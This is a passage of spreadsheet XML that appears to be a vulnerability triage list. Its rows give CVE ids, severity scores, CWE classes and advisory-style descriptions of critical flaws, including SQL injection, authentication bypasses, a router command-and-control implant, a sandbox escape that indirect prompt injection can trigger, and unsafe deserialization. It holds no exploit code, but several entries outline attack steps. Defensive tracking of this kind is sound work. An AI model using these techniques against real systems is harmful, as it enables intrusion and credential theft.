      <c r="C447" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D447" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E447" s="5" t="inlineStr"/>
      <c r="F447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G447" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L447" s="5" t="inlineStr">
        <is>
          <t>ReadyEcommerce before 4.5.2 contains an unauthenticated SQL injection vulnerability in the product listing API where the rating parameter from the products endpoint is concatenated directly into a MySQL HAVING clause without parameterization in ProductController.php. Attackers can perform time-based blind SQL injection through the unsanitized rating parameter to extract the full database contents, including user credentials and administrator password hashes, with potential additional file system access due to the database connection running as root.</t>
        </is>
      </c>
      <c r="M447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63106</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64827</t>
        </is>
      </c>
      <c r="C448" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D448" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E448" s="5" t="inlineStr"/>
      <c r="F448" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L448" s="5" t="inlineStr">
        <is>
          <t>Telenia Software TVox 26.5.3 and prior 26.x versions, and 24.9.21 and prior 24.x versions, contain an authentication bypass vulnerability in set_env.php where the redirectToLoginAdminIRequestHaveAccessToken() function derives the current page name from PHP_SELF and skips authentication when the value matches 'login_admin.php'. Attackers can append '/login_admin.php' to the path of any target PHP script to cause the authentication check to pass and gain unauthenticated access to all PHP scripts under the manager HTML directory.</t>
        </is>
      </c>
      <c r="M448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64827</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65641</t>
        </is>
      </c>
      <c r="C449" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D449" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E449" s="5" t="inlineStr"/>
      <c r="F449" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L449" s="5" t="inlineStr">
        <is>
          <t>A vulnerability allowing an unauthenticated network attacker to coerce SMB authentication from the service account.</t>
        </is>
      </c>
      <c r="M449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65641</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66747</t>
        </is>
      </c>
      <c r="C450" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D450" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E450" s="5" t="inlineStr"/>
      <c r="F450" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L450" s="5" t="inlineStr">
        <is>
          <t>Zbtlink router firmware ships an embedded remote-control implant, ENDLESSDOORS, present in every published build across the product line. It is the open-source ycsunjane/rctl tool built in as an OpenWrt package (librctl.so), started at boot and run as root under the process name kworker to blend in with the kernel's [kworker/*] threads. It opens no listening port; it phones home over cleartext TCP to a hardcoded command-and-control server (command channel 7000, interactive-shell callback 7001) with no authentication and no transport encryption, re-attempting contact roughly every 35 seconds. Its command handler passes any received string to popen() as uid=0, and a reserved rctlbash command returns an interactive root shell. Because the channel is unauthenticated and cleartext, control is not limited to whoever planted it: any party that answers at the C2 address, occupies the network path (DNS or route hijack), or acquires the hardcoded fallback domain obtains unauthenticated remote code execution as root.</t>
        </is>
      </c>
      <c r="M450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66747</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66794</t>
        </is>
      </c>
      <c r="C451" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D451" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E451" s="5" t="inlineStr"/>
      <c r="F451" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G451" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L451" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the `cluster-proxy-addon` component of Multicluster Engine for Kubernetes. This vulnerability allows an unauthenticated attacker, who can access the user-facing route, to bypass authentication and authorization checks. By manipulating URL path segments, the attacker can proxy requests to arbitrary services across any managed cluster. This enables unauthorized access to internal services that would otherwise be protected, potentially leading to information disclosure or further compromise of the cluster environment.</t>
        </is>
      </c>
      <c r="M451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66794</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67308</t>
        </is>
      </c>
      <c r="C452" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D452" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E452" s="5" t="inlineStr"/>
      <c r="F452" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G452" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L452" s="5" t="inlineStr">
        <is>
          <t>Wazuh workflows before 44bf114 contain a shell injection vulnerability in GitHub Actions that allows attackers to execute arbitrary commands by submitting pull requests with crafted VERSION.json files. Attackers can inject shell metacharacters into environment variables that are directly interpolated into run steps, enabling command execution and exfiltration of secrets including GITHUB_TOKEN and AWS credentials on self-hosted runners.</t>
        </is>
      </c>
      <c r="M452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67308</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67531</t>
        </is>
      </c>
      <c r="C453" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D453" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E453" s="5" t="inlineStr"/>
      <c r="F453" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L453" s="5" t="inlineStr">
        <is>
          <t>FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 1.5.7, the sandboxed codecall:execute tool exposes live host Zod schema instances to the script via getTool(), and because Zod v4 defines _zod as a non-configurable, non-writable own property, the ECMAScript Proxy invariants force the security membrane to hand back the raw host object, letting a script reach _zod.constr.constructor (the host Function constructor) and execute arbitrary code in the server process. A single tools/call is sufficient to escape the sandbox and achieve remote code execution as the server user, exposing everything the process holds such as OAuth client secrets, JWT_SECRET, session keys, database credentials, and cloud instance metadata. Because the framework's DEFAULT_AUTH_OPTIONS is public mode, an unconfigured server serves this to unauthenticated callers, and on authenticated servers an indirect prompt injection in tool output or fetched content can trigger it without a human attackerThis issue is fixed in version 1.5.7.</t>
        </is>
      </c>
      <c r="M453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67531</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67614</t>
        </is>
      </c>
      <c r="C454" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D454" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E454" s="5" t="inlineStr"/>
      <c r="F454" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L454" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 3.0.0 contains a hard-coded JWT secret vulnerability in the WebTerminal FastAPI SSH service that allows unauthenticated remote attackers to forge valid authentication tokens and obtain an interactive root shell via WebSocket on port 8888. Attackers can craft a forged JWT signed with the hardcoded secret value, specifying ssh_user=root, to authenticate to the terminal service without any valid credentials and receive a root shell.</t>
        </is>
      </c>
      <c r="M454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67614</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68582</t>
        </is>
      </c>
      <c r="C455" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D455" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E455" s="5" t="inlineStr"/>
      <c r="F455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G455" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L455" s="5" t="inlineStr">
        <is>
          <t>Vikunja versions &gt;= 0.24.0 and &lt;= 2.3.0 contain a broken object level authorization (BOLA) vulnerability in the task-collection endpoint (GET /api/v1/projects/{project}/views/{view}/tasks). The endpoint loads the requested project view from the URL path without verifying the caller is authorized for it. For a link-share token holder, the task scope is pinned to the share's own project, but the view is taken from the attacker-controlled path and never re-validated. As a result, a holder of any project share link can read any other tenant's kanban bucket records — bucket titles and the full created_by user object (username, name, id) — for every view in the instance. The same missing pre-authorization view load also creates a project/view-ID existence oracle (404 vs. non-404) usable by link shares and ordinary authenticated users. Task contents remain constrained to the share's own project and are not disclosed. Fixed in 2.4.0.</t>
        </is>
      </c>
      <c r="M455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68582</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68770</t>
        </is>
      </c>
      <c r="C456" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D456" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E456" s="5" t="inlineStr"/>
      <c r="F456" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G456" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L456" s="5" t="inlineStr">
        <is>
          <t>sentence-transformers contains a security control bypass vulnerability that allows attackers to achieve arbitrary code execution by exploiting a logic flaw in the import_module_class helper within sentence_transformers/util/misc.py, where the guard condition includes an 'or os.path.exists(model_name_or_path)' clause that satisfies the trust gate whenever the supplied path exists on the local filesystem, regardless of the trust_remote_code=False argument. Attackers who can control or influence the contents of a model directory on disk can place malicious Python files such as modeling_*.py referenced via modules.json, causing the code to execute at import time when an application loads the model with SentenceTransformer(path, trust_remote_code=False), bypassing the documented security contract and achieving code execution within the loading process.</t>
        </is>
      </c>
      <c r="M456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68770</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68771</t>
        </is>
      </c>
      <c r="C457" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D457" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E457" s="5" t="inlineStr"/>
      <c r="F457" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G457" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L457" s="5" t="inlineStr">
        <is>
          <t>ComfyUI v0.23.0 contains an unsafe deserialization vulnerability in the LoadTrainingDataset node that allows unauthenticated remote attackers to execute arbitrary Python code by uploading a crafted pickle file and triggering its deserialization. Attackers can upload a malicious shard_*.pkl file via the unauthenticated POST /upload/image endpoint and then queue a workflow graph via POST /prompt referencing the uploaded file, causing torch.load to deserialize the attacker-controlled pickle payload using __reduce__ and execute arbitrary commands as the ComfyUI process user.</t>
        </is>
      </c>
      <c r="M457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68771</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68929</t>
        </is>
      </c>
      <c r="C458" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D458" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E458" s="5" t="inlineStr"/>
      <c r="F458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L458" s="5" t="inlineStr">
        <is>
          <t>FastGPT is an open-source LLM platform for building AI applications on a knowledge base. In versions prior to 4.15.2, the WeChat (iLink) share-channel endpoints authorize requests using only the public shareId, with no authenticated identity or team-ownership check. As a result, an unauthenticated attacker who knows a victim team's shareId can take that team's WeChat bot offline or hijack the channel to their own bot: the logout endpoint is gated only by an existence check yet wipes the outLink's stored WeChat token, and the QR-code status endpoint performs no authorization at all and writes attacker-supplied bot credentials into the outLink identified by shareId. By generating a QR for a victim shareId, scanning it with their own WeChat, and calling the status endpoint, an attacker binds the victim team's app to the attacker's bot, exposing the app's private responses, displacing the legitimate binding, and consuming the victim's resources. The shareId is exposed in every shared chat URL, iframe, and embed, so it is not a secret. This issue is fixed in version 4.15.2.</t>
        </is>
      </c>
      <c r="M458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68929</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69356</t>
        </is>
      </c>
      <c r="C459" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D459" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E459" s="5" t="inlineStr"/>
      <c r="F459" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G459" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L459" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69657</t>
        </is>
      </c>
      <c r="C460" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D460" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E460" s="5" t="inlineStr"/>
      <c r="F460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr">
        <is>
          <t>CWE-1393</t>
        </is>
      </c>
      <c r="L460" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains a Use of Default Password (CWE-1393). Anyone with the knowledge of the credential may log in to the affected device.</t>
        </is>
      </c>
      <c r="M460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69657</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70403</t>
        </is>
      </c>
      <c r="C461" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D461" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E461" s="5" t="inlineStr"/>
      <c r="F461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr">
        <is>
          <t>CWE-259</t>
        </is>
      </c>
      <c r="L461" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains a Use of Hard-coded Password (CWE-259). Anyone with the knowledge of the credential may log in to the affected device.</t>
        </is>
      </c>
      <c r="M461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70403</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71864</t>
        </is>
      </c>
      <c r="C462" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D462" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E462" s="5" t="inlineStr"/>
      <c r="F462" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G462" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H462" s="5" t="inlineStr"/>
      <c r="I462" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L462" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a double quote in a header parameter name is emitted into the generated request-validation zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and header request-validation generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71864</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71865</t>
        </is>
      </c>
      <c r="C463" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D463" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E463" s="5" t="inlineStr"/>
      <c r="F463" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G463" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H463" s="5" t="inlineStr"/>
      <c r="I463" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L463" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a double quote in a query parameter name is emitted into the generated request-validation zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and query request-validation generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71865</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71866</t>
        </is>
      </c>
      <c r="C464" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D464" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E464" s="5" t="inlineStr"/>
      <c r="F464" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G464" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-95</t>
        </is>
      </c>
      <c r="L464" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. From version 8.19.0 until 8.21.0, a double quote in a schema property name is emitted into the generated zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and zod object-key generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71866</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71867</t>
        </is>
      </c>
      <c r="C465" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D465" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E465" s="5" t="inlineStr"/>
      <c r="F465" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G465" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-95</t>
        </is>
      </c>
      <c r="L465" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a single quote in a schema property name is emitted into single-quoted object keys in generated MSW mock factories without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated mock factory is called by tests or an MSW handler, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/keys.ts function getKey and MSW mock generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71867</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71868</t>
        </is>
      </c>
      <c r="C466" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D466" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E466" s="5" t="inlineStr"/>
      <c r="F466" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G466" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L466" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in an enum default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71868</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71869</t>
        </is>
      </c>
